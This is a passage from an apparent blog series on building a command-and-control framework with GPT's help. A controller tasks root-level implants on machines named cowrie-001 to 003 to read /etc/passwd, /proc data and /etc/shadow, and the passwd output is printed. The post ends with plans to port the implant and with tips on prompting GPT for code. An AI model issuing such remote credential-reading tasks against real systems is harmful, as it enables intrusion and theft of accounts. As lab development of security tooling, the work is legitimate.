Executed Time: 2023-05-07 12:01:09.303686
Status: Task Executed
Data: cat /etc/passwd
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 46a58a37-0aac-4b43-8112-b752904bdc1e
Created Time: 2023-05-07 12:00:36.898891
Executed Time: 2023-05-07 12:01:22.147937
Status: Task Executed
Data: cat /proc/version
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 1c4196a2-c02c-437c-846d-b65cf4ab8a45
Created Time: 2023-05-07 12:00:45.387467
Executed Time: None
Status: Task Pending
Data: cat /proc/self/cmdline
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 5a243cbb-1f99-404e-bb40-8b8759a772ee
Created Time: 2023-05-07 12:00:55.044400
Executed Time: None
Status: Task Cancelled
Data: grep bin /etc/shadow
====================
$
# now lets start getting task data.
$ python control.py --task 46a58a37-0aac-4b43-8112-b752904bdc1e --get-output
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 46a58a37-0aac-4b43-8112-b752904bdc1e
Task Data: cat /proc/version
Task Created Time: 2023-05-07 12:00:36.898891
Task Executed Time: 2023-05-07 12:01:22.147937
Task Result:
Linux version 5.15.0-58-generic (buildd@lcy02-amd64-101) (gcc (Ubuntu 11.3.0-1ubuntu1~22.04) 11.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023
Task retrieved successfully.
$ python control.py --task b183bdce-f823-459a-9a3b-37aa0fadd93f --get-output
Machine ID: 64db882066b74310abc208605a0723a6
Task UUID: b183bdce-f823-459a-9a3b-37aa0fadd93f
Task Data: cat /etc/passwd
Task Created Time: 2023-05-07 12:00:14.125102
Task Executed Time: 2023-05-07 12:01:09.303686
Task Result:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
ubuntu:x:1000:1000:guest:/home/ubuntu:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
fwupd-refresh:x:113:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
cowrie:x:1001:1001:,,,:/home/cowrie:/bin/bash
### finally we list agents again to double check the last seens have been updated.
$ python control.py --list-agents
====================
Machine ID: b74deeb2d0f0425199a8e2f562166824
uname -a: Linux cowrie-001 5.19.0-29-generic #30-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 4 12:14:09 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:57:44.696832
Last Seen: 2023-05-07 12:06:51.396213
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
Machine ID: 64db882066b74310abc208605a0723a6
uname -a: Linux cowrie-003 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:58:09.030243
Last Seen: 2023-05-07 12:07:09.726683
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
uname -a: Linux cowrie-002 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:58:21.157459
Last Seen: 2023-05-07 12:07:23.465471
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
While taking a bus after writing this section, I realised that it might be worth my while writing some kind of webshit frontend - something I absolutely abhor doing. Maybe that will be a later post. I'll certainly be getting some kind of AI code generator to do that for me.
Conclusion of Part 1. Discussion of where we will go next.
At this point, I've written up enough for now, and touched upon a few ideas as to where we will go next.
The next steps will likely include addressing cryptography issues - by trial and mostly error. I'll probably have a few posts where I do the crypto wrong to show the "thought process". Even worse - I'll be getting GPT to write the crypto code where possible.
I'd originally planned to cover cryptography in this post, but it was getting too long and I wanted to publish before the end of the week. Since I only work on this during evenings and lunch breaks, I didn't have time to really explore the cryptography stuff beyond writing down some notes.
Beyond cryptography, I want to improve the API, discuss scaling issues/attacks, improve the user experience, fix some bugs, and about a thousand other things - improving what data it collects for check-in, porting the implant to other operating systems, etc.
Now, it's time to talk about the GPT part a bit.
I noticed something interesting - the longer a "chat" goes on, the more likely it is to "lose context" and start emitting buggier code. Effectively, there is a limit on how long it can maintain state/context - a memory limit of sorts on how many tokens it can hold, beyond which earlier parts of the conversation fall away.
So you get better results asking it to do one specific, small task, and iterating on that specific, small task until it's done - then hand-assembling the components yourself.
Which is what we will do in future episodes.
So far though? I'm fairly happy with the GPT emitted code as a proof of concept. It isn't great, but it is also not terrible, and I got to spend more time thinking about design elements of the program than remembering how to do some vague thing.
In future, I think my approach of using GPT to write shit like this will be to locally write the program as pseudocode, come up with the functions/arguments/types needed, then in separate chat instances ask it to build out each part individually.
That way I can spend a lot of time reasoning about design, and not worry overmuch about implementation of a proof of concept.